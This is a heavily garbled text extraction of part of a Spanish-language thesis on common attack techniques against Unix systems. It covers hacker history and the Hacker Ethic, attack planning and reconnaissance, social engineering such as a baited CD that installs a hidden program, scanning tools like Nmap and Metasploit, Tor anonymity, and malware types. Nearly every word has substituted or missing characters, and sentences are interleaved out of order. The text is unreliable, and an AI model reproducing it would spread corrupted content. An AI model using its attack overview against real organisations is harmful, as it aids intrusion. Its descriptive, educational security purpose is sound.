"ri era e "resa conocida ' abocada a "roducir siste as de este ti"o# con ,teve 4oznia6 ' ,teve Jobs a la cabeza. Bill Pates ' !aul Allen# si bien no /ueron ie bros de este club# /ueron "arte de esta corriente ' desarrollaron su "ri er ' e9itoso "roducto% el lenguaje 4ltair 5asic# que se volvi8 el lenguaje estndar "ara la "rogra aci8n de las icroco "utadoras. Cali/ornia, ,in e bargo# vale la "ena dejar en claro que este nuevo ovi iento estaba u' in/luenciado "or la "osibilidad de $acer negocios con las e "resas tradicionales ' llevar la co "utaci8n a la gente no tcnica# ' aqu) no todos sus ie bros "ertenec)an a la co unidad $ac6er clsica# "or su cultura# tica ' co "orta iento. !or eje "lo# so=t@are# tanto "ara uc$os estaban en contra de compartir el ejora co o investigaci8n# ' eran "artidarios de crear un En los aBos subsiguientes este gru"o de $ac6ers ' sus e "rendi ientos dieron origen al conocido Silicon Valle1 ;Lalle del ,ilicio># en
odelo de licencias ' so"orte e "resarial# cerrando el ca ino a la innovaci8n co o se ven)a dando "or los CviejosD $ac6ers.
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. ** de 22O
a> :os $ac6ers del 7F, ' las !5!(*.. b> :os $ac6ers de 2ni9# el lenguaje C# ' las !5!(**&LAA. c> :os $ac6ers de las co "utadoras "ersonales. :os aBos MO. transcurrieron entre uc$)si os ca bios ' avances ezclados ostrar sus aBos#
tecnol8gicos. ,i bien los $ac6ers del 7F, ' las !5!(*. 'a estaban algo con los de 2ni9 ' las !5!(**# 'a que su tecnolog)a e "ezaba a conocido co o el C!ro'ecto JG"iterD.
ta bin es"eraban ansiosa ente la nueva encarnaci8n co "atible de la !5!(*.# !ero no result8 co o es"eraban. A "esar de que estaba en buena /or a# en *0O- 5EC cancel8 el "ro'ecto# "ara concentrarse Gnica ente en la l)nea LAA de inico "utadoras# que 'a era i "le entaci8n ' 9ito. ?tro u' redituable econ8 ica ente# ' con aBos de otivo de 5EC acerca de esto /ue que un sucesor ercado '
de la !5!(*. ter inar)a co "itiendo con LAA# con/undiendo al is o so/tIare ' "ro'ectos que los nucleaba no era "ortable.
dividiendo sus es/uerzos. Esto signi/ic8 el /in del 7F, ' su cultura# 'a que el As) /ue co o el siste a o"erativo B,5 2ni9 sobre la arquitectura LAA# conectada a la A<!A@et ;'a aislada de entidades aBos la a'or)a de los $ac6ers del "ri er gru"o /ueron ilitares ' utilizando el igrando a l. "rotocolo FC!&7!># /ue el siste a de $ac6eo C por excelenciaDSE<==T# ' con los ,in e bargo# el que alcanz8 el 9ito /ue la tercera corriente tecnol8gica# con sus "roductos alcanzando la co "leta vertiginosa# asividad# /a a ' /ortuna ;"or eje "lo# la u' !C de 7BM ' el M,(5?,># con sus co "aB)as creciendo en /or a resto ;$ec$o conocido co o la CPuerra de los 2ni9DS47R7U24T>. ,in e bargo# es de destacar que segGn Eric <a' ond SE<==T# si bien $acia /ines de los MO. los entusiastas de las 8rdenes de icroco "utadoras crecieron en varios agnitud con res"ecto a la cultura $ac6er# nunca se convirtieron en
una comunidad con conciencia propia. @unca desarrollaron una tradici8n co Gn de jerga# /olclore ' $istoria en co Gn. Liendo que 2ni9 estaba siendo disgregado# co ercializado "or grandes e "resas co o so/tIare cerrado ;"ro"ietario> ' de este odo "erdiendo su ClibertadD ;as) vista "or l># <ic$ard ,tall an cre8 el "ro'ecto P@2 SP@2T en *0O' la F,FSF,FT en *0O5 ;Free Soft.are Fundation# Fundaci8n de ,o/tIare :ibre>.
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *2 de 22O
El "ro'ecto P@2 a"untaba a crear una "lata/or a ;,iste a ?"erativo ' conjunto de utilidades> de so/tIare co "atible con 2ni9 de libre uso# las dcadas anteriores*5. Ka en los aBos M0.# el "ro'ecto P@2 ten)a uc$as $erra ientas desarrolladas# e9tendidas ' de calidad# "ero segu)a /altando un nGcleo "ara su ,iste a ?"erativo# 'a que se segu)a de"endiendo de versiones co erciales de 2ni9 "ara utilizarlas. Cuando lleg8 el o ento en que las !Cs /ueron su/iciente ente "oderosas# era cuesti8n de tie "o el que algGn conjunto de $ac6ers llevara una versi8n de 2ni9 a esta "lata/or a tan e9tendidaH as) /ue co o :inus ForvaldsS47R7U:FT desarroll8 :inu9SRernT# junto a un nG ero cada vez a'or de $ac6ers# sie "re con la red de "or edio. a'or# ' aun8 a un Linux =ue el comien3o del resur)imiento de la comunidad 9ac:er . El ,o/tIare :ibre ;F:?,,> /ue creciendo a un rit o cada vez nG ero creciente de $ac6ers alrededor del Co o conclusi8n# lo undo. odi/icaci8n ' distribuci8n# tal co o la co unidad $ac6er estaba acostu brada a $acerlo durante
varias )eneraciones de 9ac:ers nacieron ! crecieron conectados a la red DAR4ANet al principio e Internet lue)oE% ! el o(jeto de su actividad creativa ! de investi)aci-n )ira(a alrededor ! )racias a ella . La red los uni-% los 9i3o crecer% desarrollarse% aprender% compartir% es decir% ser 9ac:er si)ni=ica en cierta =orma >estar? en la red aportando al)o a ella. Es "or eso que el $ac6er est tan asociado e identi/icado con el a"rovec$a iento ' e9"lotaci8n de vulnerabilidades# la obtenci8n de in/or aci8n re ota# investigaci8n de dis"ositivos conectados# es decir# 9ac:ear en la red.
*5 Cabe resaltar que ,tall an "ertenec)a a la generaci8n de $ac6ers del 7F, ' de las !5!(*.. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *- de 22O
velocidad. :os grandes co "utadores do inaban la escena de las cor"oraciones ' la con=ian3a en el so/tIare que se ejecutaba ' en las redes ' actores que coo"eraban era al)o com'n# que se daba "or sentado. XVu es lo que ca bi8# que $o' en d)a los delitos in/or ticos ;o la idea de que> son tan co unesY Muc$o. Al e9tenderse la tecnolog)a ;e 7nternet en los Glti os aBos> en el creando virus# undo# la se)uridad en (ase a la con=ian3a =ue dejando paso al so=t@are especiali3ado% expertos en se)uridad in=ormtica ! crac:ers alIare# atacando siste as en l)nea ' robando in/or aci8n '&o ercado de la seguridad in/or tica undo ' no tiene l) ites dinero de los usuarios o de las e "resas. El visibles a ediano "lazo.
en *0O1%
Access to computers and anything which might teach you something about the way the world works should be unlimited and total. Always
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *1 de 22O
yield to the Hands-On Imperative! % El acceso a las co "utadoras ' cualquier cosa que "ueda enseBarle algo acerca de c8 o /unciona el undo deber)a ser ili itado ' total. ,ie "re r)ndase al i "erativo de CZManos a la ?bra[D. C:os $ac6ers creen que las lecciones esenciales acerca de los siste as ' del undo "ueden ser a"rendidas aislando las cosas# viendo c8 o s /uncionan# ' utilizando este conoci iento "ara crear nuevas ' $asta
interesantes cosas. Ellos se o/enden de cualquier "ersona# barrera /)sica# o le' que intente evitar que ellos $agan esto.D S...T C:as reglas que le i "idan to ar las cosas de esta /or a en sus "ro"ias rid)culas "ara siquiera res"etarlas.D
All information should be free% Foda la in/or aci8n deber)a ser libre. Es decir# todo e9"eri ento e investigaci8n deber)a ser "Gblica ' de libre conoci iento# as) co o sus resultados. C,i usted no tiene acceso a la in/or aci8n que necesita "ara ejorar las cosas# XC8 o "uede arreglarloYD S...T CEsto evita el te eroso ritual de la "rdida de tie "o reinventando la rueda% en vez de que todos escriban su "ro"ia versi8n del is o "rogra a# la ejor versi8n estar)a dis"onible "ara todos# ' todos ejorar eso.D deber)an ser libres de "ro/undizar en el c8digo '
Mistrust Authority !romote "ecentrali#ation% 5escon/)a de la autoridad# "ro ueve la descentralizaci8n. C:a ejor anera de "ro over el libre interca bio de in/or aci8n es teniendo un siste a abierto# algo que no "resente l) ites entre un $ac6er ' una "ieza de in/or aci8n o un ele ento de un equi"a iento que necesita en su bGsqueda del conoci iento# ejora ' tie "o en l)nea. :a Glti a cosa que necesita es burocracia. :as burocracias# sean cor"orativas# del gobierno o universitarias# son siste as de/ectuosos# "eligrosos# de anera que no "ueden ada"tarse al i "ulso e9"loratorio de los verdaderos $ac6ers.D
Hackers should be $udged by their hacking not bogus criteria such as degrees age race or position% :os $ac6ers deber)an ser juzgados "or lo que $acen ;$ac6ear># no "or /alsos criterios co o t)tulos# edad# raza o "osici8n. C:a gente que acced)a ;a donde estba os> ' que "arec)an ostrar credenciales i "resionantes no eran to adas en cuenta seria ente $asta que se "robaban a s) is os en la consola ; ver "g. +# nota al "ie nro.*2>
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *5 de 22O
de una co "utadora. Este rasgo meritocrtico no est necesaria ente basado en la bondad in$erente de los corazones de los $ac6ers# sino que "rinci"al ente les i "orta "otencial de
%ou can create art and beauty on a computer % 2sted "uede crear arte ' belleza en una co "utadora.DEl "rogra a "or co "aBeros $ac6ersDS...T C=a' de/initiva ente un i "ulso art)stico dentro de aquellos que "ueden utilizar esta tcnica de genio( arciano# de una calidad visionaria que los $abilita a descartar el "unto de vista actual ' establecer# de una /or a total ente ines"erada# un nuevo algorit oD. &omputers can change your life for the better % :as co "utadoras "ueden ca biar su vida "ara ejor. 'ike Aladdin(s lamp you could get it to do your bidding % Co o la l "ara de Aladino# usted "uede so eter a la co "utadora co "leta ente a sus 8rdenes. C,egura ente cualquiera "odr)a bene/iciarse al e9"eri entar este "oder. ,egura ente cualquiera "odr)a bene/iciarse de un undo basado en la Etica =ac6er. Esta era la creencia i "l)cita de los $ac6ers...D. =a' otra "ublicaci8n s reciente# que vale la "ena citar# donde el iran C"uertas adentroD '
otivaci8n de los $ac6ers ' su co unidad# su /or a de ver las cosas '
su tica% C- e Hacker 3t ic and t e Spirit of t e 6nformation 4ge DS=ACRUEF=7CT ;C:a Etica =ac6er ' el Es")ritu de la Era de la 7n/or aci8nD>. En resu en# si bien en *0O1# cuando estos "rinci"ios $asta ese con el "ro'ecto P@2H la Etica =ac6er 'a estaba "resente en la =ac6er ' en "rctica durante alrededor de 25 aBos# dieron origen al del ,o/tIare :ibre de $o' en d)a. Fa bin sus tecnolog)as i "ortant)si as aGn en nuestros d)as ;' el "rotocolo FC!&7!# Et$ernet# C ' 2ni9 o ento tcitos /ueron "uestos en "a"el ' <ic$ard ,tall an recin co enzaba su cruzada a'or)a de la ovi iento co unidad de e9"ertos in/or ticos. Estos "rece"tos# /ruto de la lla ada Cultura ie bros desarrollaron
;Cpenetration testingsD># los exploits# la ingenier)a reversa# ' $ac6ers $ace s de 2. aBos.
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *J de 22O
Co o "uede verse en la ilustraci8n# los ataques a deter inados siste as suelen ser "lani/icados# es decir% el atacante en "ri era instancia busca un cierto objetivo# luego obtiene in/or aci8n general de la estructura de red# versiones de so/tIare# etc. ' "osterior ente utilizar una estrategia# a"licando una o general ente varias tcnicas "ara vulnerar el siste a. !robable ente en algGn o ento busque algo de anoni ato "ara $acer sus quinas intro isiones# "or eje "lo utilizando una red "Gblica# un ejrcito de
C$ombieD# uno o varios siste as inter edios# o un siste a interno ;es decir# desde dentro de la organizaci8n> desde donde co "ro eter a otros siste as internos. :uego# segGn se desee# se "ueden li "iar los rastros# o recurso obtenido antener el control del ediante C"uertas traserasD o rootkits# ' luego a"rovec$ar el
siste a co "ro etido "ara CsaltarD a otro objetivo ;quizs# el objetivo original>. Es i "ortante re arcar que esta tendencia de ataques "lani/icados ' "ersonalizados se encuentra en au ento# debido a la creciente di/icultad de encontrar una Gnica anera de vulnerar un siste aH la red es cada vez s $eterognea ' evidente ente la /alsa sensaci8n de seguridad de $ace algunos aBos oblig8 a que los ad inistradores de siste as ' "rogra adores tuvieran co o
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *+ de 22O
a'or "rioridad la tolerancia a /allos# esque as de seguridad# bac6u" ' e ergencia# "or no brar algunas edidas co unes. ,egGn el ,A@,*J# "ara el aBo 2..+ los ataques in/or ticos con objetivos bien de/inidos ' "lani/icados se encuentran en el cuarto "uesto dentro un in/or e acerca de las *. tendencias
S,A@,UF?!*.T.
K agrega*+% C:os ciber(ataques dirigidos de naciones en contra de los siste as de gobierno de los Estados 2nidos $an sido enor e ente e9itosos en los Glti os tres aBos# de ostrando el /racaso del gobierno /ederal en cuanto a actividades de seguridad. S...T :os ataques "lani/icados a organizaciones co erciales se dirigirn a contratistas valiosa de sus clientesD. ilitares ' negocios con in/or aci8n u'
no intrusiva de todos los as"ectos tcnicos# $u anos ' culturales de la organizaci8n. Fa bin algunos e9"ertos la deno inan C<econoci iento !asivoD ;9Passive :econnaissance;2# ' resaltan su i "ortancia en todo el "roceso de ataque. ,egGn Eric Cole ;S=ACRUBE4T# "g. -J>% CEn algunos casos# el reconoci iento "asivo "uede "roveer todo lo que un atacante necesita "ara obtener acceso. En "ri era instancia "odr)a "arecer que no es tan Gtil# "ero no sobresti e la cantidad de in/or aci8n que un atacante "uede adquirir si es realizado correcta ente. :os ataques "asivos*O# "or naturaleza# "ueden no "arecer tan "oderosos co o los activos*0# "ero en algunos casos "ueden ser algo ejor% acceso garantizado entre varias avenidas2.D. s "oderosos. Con los ataques "asivos# usted no obtiene acceso directo# "ero a veces usted $asta obtiene
uc$o
s# son de
a'or cantidad de
anos
*O Eric Cole utiliza Cataque "asivoD ' Creconoci iento "asivoD de /or a indistinta ' co o sin8ni os. 5e $ec$o# le da la categor)a de CataqueD a algo que es in/or aci8n# justi/icndolo tal co o se transcribe. *0 :os ataques activos se utilizan "ara re/erenciar la secci8n *.-.-. 2. CavenidasD en dic$a /rase es una et/ora de siste a&red "ro"ia de la organizaci8n. era ente una bGsqueda de
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *0 de 22O
"rivadas a las que el atacante tiene accesoH "or eje "lo# el "adr8n de votantes de la Argentina es u' sencillo de conseguir en la red. K brinda in/or aci8n de Fi"o ' @G ero de 5ocu ento# 5irecci8n# @o bre co "leto# se9o# estado civil ' /ec$a ' lugar de naci iento# de cada votante de Argentina# que "ueden ser usados a anera de identi/icaci8n "or usuarios de siste as con acceso desde 7nternet.
1otores de &'squeda. Buscadores co o Poogle ' Ka$oo "er iten encontrar en segundos una criterio es"ec)/ico. Es ultitud de "ginas que coincidan con un s# los atacantes suelen a"rovec$ar varios
ele entos de bGsqueda dis"onibles en el buscador que co binados les "er ite au entar el /actor de 9ito de /or a considerable.
Ao=t@are especiali3ado. E9iste so/tIare que con a'uda de los dos ele entos anteriores co bina ' trans/or a un dato es"ec)/ico en una CredD de resultados "osible ente relacionados# con cierta inteligencia.
este nodo# a di/erencia de los que residen /uera de la red de la organizaci8n. Ade s de las "osibilidades de obtener in/or aci8n del "unto anterior# aqu) las "osibilidades se a "l)an sustancial ente# entre las encuentran%
s co unes se
Fscuc9ar2* tr=ico de otros componentes de la red. Acceder a la in=ormaci-n del equipo ! la que se encuentra disponi(le en vol'menes compartidos de la red % e( ails# docu entos# contraseBas# listados de usuarios# arc$ivos# bases de datos# registros# cualquier dato que "ro"orcione aneras de ingresar al siste a objetivo.
2* CEscuc$ar el tr/icoD
es Csni//D# que signi/ica C$us earD# u ColerD. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 2. de 22O
ele ento de in/or aci8n que "er ita acceder o al todos inclu'e%
:la adas tele/8nicas. Mensajes de te9to. ,esiones de c$at o dilogos v)a Env)o de correos electr8nicos. Lisitas "ersonales Env)o e 7nstalaci8n de "rogra as en !Cs de e "leados de la entidad# co o "or eje "lo%
ensajer)a instantnea.
,"'Iare% obtienen in/or aci8n de uso# $bitos# $istorial de navegaci8n# ' lo re"ortan a un sitio central. Fro'anos% 2n "rogra a del ti"o CCaballo de Fro'aD S47R7UF<?KT# es un "rogra a que a"arente ente cu "le cierta /uncionalidad# "ero que sin que el usuario lo se"a utiliza el equi"o con otros /ines. !uede ser utilizado "or el ingeniero social "ara instalar "uertas traseras ' conseguir acceso local a la red objetivo# instalar un 6e'logger# etc. 2n 6e'logger ca"tura las contraseBas ' todo lo que ti"ee el usuarioH "uede enviarlas a un sitio re oto o si el intruso tiene acceso local# llevarse el registro en edios de al acena iento "orttiles.
Peneral ente $acindose "asar "or otra "ersona# el atacante utiliza in/or aci8n obtenida anterior ente "ara "ersuadir a una "ersona de que le "rovea cierta in/or aci8n# o que se dirija a una "gina Ieb en "articular ' llene un
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 2* de 22O
/or ulario# o que le env)e un /a9 con ciertos datos# etc. :as "osibilidades ' situaciones son casi in/initas# ' los estudios al res"ecto son alar antes "ara toda entidad "reocu"ada "or su seguridad S7,?CU,FAFT# donde se re/leja lo sencillo que es conseguir in/or aci8n s o enos sensible de la a'or)a de los usuarios. !ara eje "li/icar# un "osible intruso# "ara conseguir acceso a la estaci8n de trabajo de un e "leado de una e "resa# "odr)a enviarle "or correo tradicional a su escritorio un "en drive# C5# etc. de regalo# de alguna e "resa cliente# "ara que lo vea. :uego# el e "leado inserta el C5 dentro de la co "utadora de su trabajo ' ejecuta la "resentaci8n# que ade s de ostrarle la salutaci8n "ara "asar desa"ercibido# instala ta bin un "rogra a oculto que env)a in/or aci8n del equi"o al atacante v)a internet# to ando el control de su equi"o# ' sirviendo de "uerta de entrada a toda ;o "arte al enos de> la red de la e "resa.
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 22 de 22O
cualquier otra "recauci8n "uede ser vencida "or un decidido atacante con "osesi8n /)sica de una co "utadora. Con/igurar "er isos de arc$ivos# establecer contraseBas de acceso# ' ocultando el Glti o no bre de usuario ' contraseBa utilizados "ara iniciar la sesi8n son todos intentos loables# "ero no van a /rustrar a un atacante e9"eri entadoD. As) ' todo# $a' (umpster diving uc$as $istorias ' tcnicas sobre bGsqueda activa de
7%6<6=(U/P8 %
debilidades de este ti"o que se distribu'en "or la red# co o "or eje "lo%
Consiste en
revolver la
basura
;literal ente> de la organizaci8n# en busca de in/or aci8n Gtil. Muc$as e "resas no tienen un control sobre lo que se desec$a ' lo que no# ' "uede ser interesante "ara obtener docu entaci8n# disco r)gido roto o anticuado "uede contener "ara un ataque e9itoso.
edios
agnticos# etcH un
>ock picking 7%6<6=>?&<8% Fcnicas "ara abrir cerraduras# sin daBarlas ' sin "oseer la llave. 7nstalaci8n de <e1loggers "or $ardIare S47R7UR:?PT % 2n 6e'logger "or $ardIare es un dis"ositivo que se conecta al teclado# o al "uerto 2,B que registra en su disi ulado. e oria todo lo que el usuario tecle8# estando escondido o
S oulder Surfing 7%6<6=SSF8 % Alguien entrenado a $us ear las contraseBas de los de s ientras las ti"ean. Pigg1backing 7%6<6=P6@8 % Consiste en $acerse "asar "or alguien autorizado "ara sortear un "uesto de seguridad# co o "uede ser la entrada a un edi/icio.
anera intenta
Aistemas de 1onitoreo ! de 2iltrado de tr=ico % 75,s# 7!,s# FireIalls# <outers# ,Iitc$es# etc. Aistemas 0perativos% 2ni9 ;,olaris# B,5s# etc.># :inu9# @ovell# Mac ?, A# 4indoIs# etc. ' sus versiones en "articular. AervidoresGAervicios% FF!# 4eb# Mail# 5@,# Fer inales# L!@# etc.H qu so/tIare ejecutan "ara i "le entar dic$o servicio ' en qu versiones# tanto del "rotocolo del servicio co o del so/tIare. Aplicaciones%
A"licaciones 4eb% CM,s ;Content Manage ent ,'ste s># Frac6ing# A"licaciones que ,"a ' Anti(Lirus.
7ssue
A"licaciones co erciales% ,iste as de Pesti8n# E<!&C<M. A"licaciones de co unicaci8n% Mensajer)a instantnea# 7<C. Foda a"licaci8n que utilice la red ' est brindando un servicio a travs de ella.
,i la objetivo# el
eta del atacante en esta eta"a es tener una Cradiogra/)aD del siste a edio "ara generarla es realizar una detecci8n de los "uertos
abiertos21 en "ri era instancia# ' luego deter inar la versi8n es"ec)/ica ;o al enos a"ro9i ada> del so/tIare que est detrs# en lo que se conoce co o enumeraci-n. Co o "uede deducirse al ver el listado# as) co o la cantidad de "osibilidades es real ente enor e# existe una cantidad i)ual de )rande de pro)ramas desarrollados en pos de o(tener in=ormaci-n remota H con el tie "o# un crac6er e9"eri entado "uede $acerse de un Ctool6itD25 i "ortante ' diverso de so/tIare "ara obtener in/or aci8n ' veri/icar debilidades en los siste as. AGn as)# se "uede considerar a Nmap co o el s utilizado 'a que es el
21 2n puerto ;en el "rotocolo FC!> es un nG ero que re"resenta una cone9i8n con la ca"a de red 7! del ,iste a ?"erativo. !uede tener varios estados# ' el estado CabiertoD signi/ica que $a' un "rogra a asociado al is o que est escuc$ando "or "eticiones de otros "rogra as en la red# usual ente "ara devolverle algGn resultado 25 Fool6it% Conjunto o CCajaD de $erra ientas. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 21 de 22O
s verstil ' "oderoso# "ero e9isten ="ing ' ,ca"'# @essus# Core 7 "act# 7 ca"acidades di/erentes. Es
s otros con /ines es"ec)/icos co o 7ngu a# @i6to# Metas"loit# unit' Canvas# etc.# cada uno con objetivos ' s# la red est "oblada de estas $erra ientas# '
cualquier $ac6er "odr)a desarrollar una que obtenga in/or aci8n a "artir de alguna vulnerabilidad nueva# "ublicada o conocida. 7ncluso algunos co binan estas tcnicas de rastreo con una base de datos de vulnerabilidades ' $asta la anera de e9"lotarlas ;e9"loits>. :a idea es "resentarle anera# con al ad inistrador una suite co "leta de penetration testingAB. 5e esa
una Gnica $erra ienta# un tcnico "uede rastrear uno o varios siste as de la e "resa# ' sta# con una inter/az gr/ica a igable# ejecuta los siguientes "asos% *. Mediante so/tIare de rastreo e identi/icaci8n# realiza las averiguaciones de la e9istencia o no ' versi8n de los di/erentes co "onentes de so/tIare que se estn ejecutando en el objetivo. 2. Co "ara los resultados con su base de datos de /ir as2+. -. Muestra un in/or e con las vulnerabilidades detectadas# la gravedad que re"resentan# ' c8 o se "uede re ediar o al enos itigar. 1. !er ite ejecutar e9"loits relacionados# con el /in de co "robar si real ente e9iste la vulnerabilidad ' qu consecuencias conlleva. 5. <ealiza una li "ieza de todo lo $ec$o. Co o "uede verse# realizan todos los "asos t)"icos de un test de "enetraci8n )ntegro. Estas $erra ientas tienen uc$)si a utilidad "ara los ad inistradores de siste as ' redes grandes# 'a que entre sus ventajas se cuentan% <educir la co "lejidad de una auditor)a. !er itir realizar un anlisis Cquic6 and dirt'D 2O del estado general en
2J Ler Plosario% !enetration Festing# "g. 2**. 2+ /ir a% una /ir a ;ta bin deno inado C fingerprintD# o C$uella digitalD> es una secuencia de b'tes que identi/ican un)voca ente algoH en el conte9to se re/iere a una /ir a del conjunto de "rogra as que se estn ejecutando en el o los siste as re otos. 2O Cquic6 and dirt'D% <"ido ' sucio. Es una /rase de la jerga que signi/ica resolver un "roble a en /or a r"ida "ero sin eli inar en /or a co "leta el general ente es un "roceso s co "lejo ' largo>. otivo que lo caus8 ;lo cual
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 25 de 22O
@o se necesitan e9"ertos "ara realizarlo. Es s barato ' re"roducible las veces que se necesiten# que contratar a un equi"o e9terno ;o interno> de "enetration testers una Gnica vez. ,in e bargo su objetivo s8lo es $acer un test de "enetraci8n de /or a
si "le# ' ade s de ser onerosas ;algunas># s8lo conte "lan un conjunto sie "re reducido de ca"acidades# 'a que las base de datos de e9"loits son desarrolladas ' ad inistradas "or el "roveedor del so/tIare. Ade s# dada su naturaleza# es s8lo un e9a en de seguridad a nivel de so/tIare# ientras que no tienen en cuenta las $abilidades del atacante "ara e9"lotar la ingenier)a social# utilizar e9"loits que no $a'an sido $ec$os "Gblicos# arreglados# desarrollados o conocidos aGn# a"rovec$ar de/iciencias en la o"eratoria de la organizaci8n# e in/inidad de CagujerosD "or donde el intruso "uede atacar. Es decir# es una $erra ienta de =uncional de los crac:ers. uc$a a'uda# "ero no es >el? reempla3o
en uno o varios lugares% "roveedores de internet# routers ' redes inter edias# ' lo s i "ortante% logs20# siste as de identi/icaci8n de intrusos ;75,s> ' onitoreo en el siste a objetivo is o o en equi"os destinados a tal siste as de
Can8ni osD antes de alcanzar el objetivo# aunque esto re"ercuta en la de ora del env)o ' rece"ci8n de los ensajes. Fa bin es "osible utilizar una red de "ro9's ;en /or a de gra/o no dirigido> que realizan su co unicaci8n en /or a encri"tada ' variando los CsaltosD que recorre el tr/ico "or cone9i8n% Tor-*. ?tra "osibilidad es utilizar lugares "Gblicos de acceso a internet# cone9iones de terceros# etc. :as "osibilidades son a "lias# conocidas ' de"endiendo del nivel de anoni ato# co "lejidad ' velocidad# el intruso ;o varias> de ellas. u' "robable ente elegir alguna
undo del
Birus S47R7UL7<2,T: 2n virus es un "rogra a escrito con la /inalidad de ser instalado inadvertida ente "or el usuario de un siste a# "asando desa"ercibido durante todo su ciclo de vida# ' que "uede re"roducirse a s) is o en otros nodos la a'or cantidad de veces que "ueda# tal co o los ientras reside en el equi"o de"ende de su virus biol8gicos. Vu $ace
"rogra aci8n# "ero suele "oseer el control co "leto del equi"oH "udiendo eli inar arc$ivos# establecer contacto con la red# etc. 2n virus "uede ser utilizado -2 "or un crac6er "ara dirigir desde los nodos a/ectados un ataque a un objetivo en "articular# en un deter inado o ento.
o gusano es
;t)"ica ente es con/undido con uno de ellos cuando de usuarios no es"ecializados se trata># con la salvedad de que sus
-* For% F$e ?nion <outer. 2<:% $tt"%&&III.tor"roject.org -2 El c8digo /uente de los virus suele conocerse o di/undirse "ri era ente en sitios rec8nditos de internet# en redes Cde con/ianzaD# redes de crac6ers# salas de c$at# etc. Esto /acilita la odi/icaci8n ' "ro"agaci8n de los ejecutables antes que las e "resas /abricantes de antivirus "uedan reaccionar. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 2+ de 22O
"ro"agaci8n son di/erentes. :os Ior s utilizan vulnerabilidades re otas de seguridad conocidas de siste as o"erativos# servicios ;4eb# Base de 5atos# Mail# Ft"># etc. "ara to ar el control de un $ost ;equi"o> conectado a la red. ,i bien se "uede su"oner que al ser vulnerabilidades conocidas ;' con cierta antig^edad> su )ndice de 9ito ser bajo# en realidad general ente tienen bastante 9ito# ' re otas graves ' de so/tIare uc$os "roble as a 2n Ior uso intensivo de recursos% C!2# "uede ser creado o s si se trata de vulnerabilidades u' utilizado. 2sual ente agota o $ace un e oria# disco# red# etc. ' esto causa odi/icado "ara to ar el control de
cualquier objetivo conectado a la red# con el "ro"8sito de que se una a una botnet ;ver debajo> o que sirvan de nodo inter edio "ara ser controlados re ota ente instalando "uertas traseras ;ver "g. -*> o root6its ;ver abajo># ' "osterior ente realizar ataques u obtener in/or aci8n del objetivo. Cuando un nodo es conquistado ' se lo antiene bajo control "ara "osteriores actividades# se lo deno ina C3om(ieD S47R7UQ?MB7ET.
Root:its S47R7U<R7FT: 2n root6it es un ti"o de "rogra as que co o gru"o son diseBados "ara vulnerar ' ca u/larse en el siste a objetivo# dis"oniendo del control total del equi"o ' de las utilidades de odi/icando el co "orta iento onitoreo# ad inistraci8n ' seguridad del siste a
o"erativo "ara evitar ser detectados. !uede ser instalado "or un tro'ano ;ver "g. 2*># un Ior # ser ejecutado "or el usuario inducido "or el atacante v)a ingenier)a social# etc. En la a'or)a de los casos# instalan una "uerta trasera "ara que el atacante acceda sin "roble as en /or a re ota. Con alguna o varias de estas $erra ientas es "osible que el atacante utilice los equi"os bajo su control ;sus Czo biesD> directa ente $acia el objetivo# o ta bin "uede organizar una red de ellos# es"erando conjunta ente "or sus 8rdenes# lo que se deno ina una &otnet S47R7UB@EFT.
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 2O de 22O
con
a'or o
Estructura de las <edes ' "untos de entrada&salida "Gblicos '&o "rivados. Vu servicios se brindan en cada uno ' "ara quin. Vu so/tIare ' dis"ositivos se ejecutan en cada nivel de la "ila FC!&7!. :a gente que lo ad inistra# in/or aci8n "ersonal. Con toda esta in/or aci8n# obtenida a lo largo del "er)odo de investigaci8n# s un "er/il tcnico o social ' quizs algo de
quizs 'a sea "osible crear una lista de vulnerabilidades "otenciales "or las cuales el atacante "odr vencer a las l)neas de de/ensa del objetivo. 5ic$a lista es el "roducto del anlisis conocido co o mapeo de vulnera(ilidades--. :o ideal es "riorizar dic$a lista# identi/icando la di/icultad in$erente de cada agujero detectado o que se sos"ec$a que e9iste. Fa bin# si se investig8 una red o varios $osts# se "uede "riorizar "or equi"o% "or eje "lo# los siste as que se encuentran en eta"a de "ruebas ;Ctest.e "resa.co D># o con s vulnerables ' general ente uc$os servicios abiertos# sern enos vigilados que los que estn en "roducci8n#
"or lo que son "re/eribles "ara co enzar el ataque. Ade s es a"licable una veri/icaci8n de no estar atacando algGn $one'"ot -1. Es decir# a"licar el sentido co Gn en el ordena iento de los objetivos es "ri ordial en esta "arte del "roceso. 2na buena de/inici8n ;S=ACRUEA!T# ca". 5> de quizs# la eta"a i "ortante antes de atacar el objetivo es% CEl s a"eo de vulnerabilidades es el
"roceso de relacionar atributos es"ec)/icos de seguridad de un siste a a una vulnerabilidad asociada o "otencial. Esta es una /ase cr)tica en la e9"lotaci8n de un siste a objetivo que no deber)a ser "asada "or alto.D Co o a'uda# el atacante "uede recurrir a bases de datos "Gblicas de
-- :a "alabra C a"eoD es una castellanizaci8n del ingls C a"D# que signi/ica trazar en un ,e utiliza -1 Ler Plosario% =one'"ot# "g. 2**.
a"a.
uc$o "ara $acer re/erencia a la traza de "untos# ideas# relacionar una cosa con otra.
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 20 de 22O
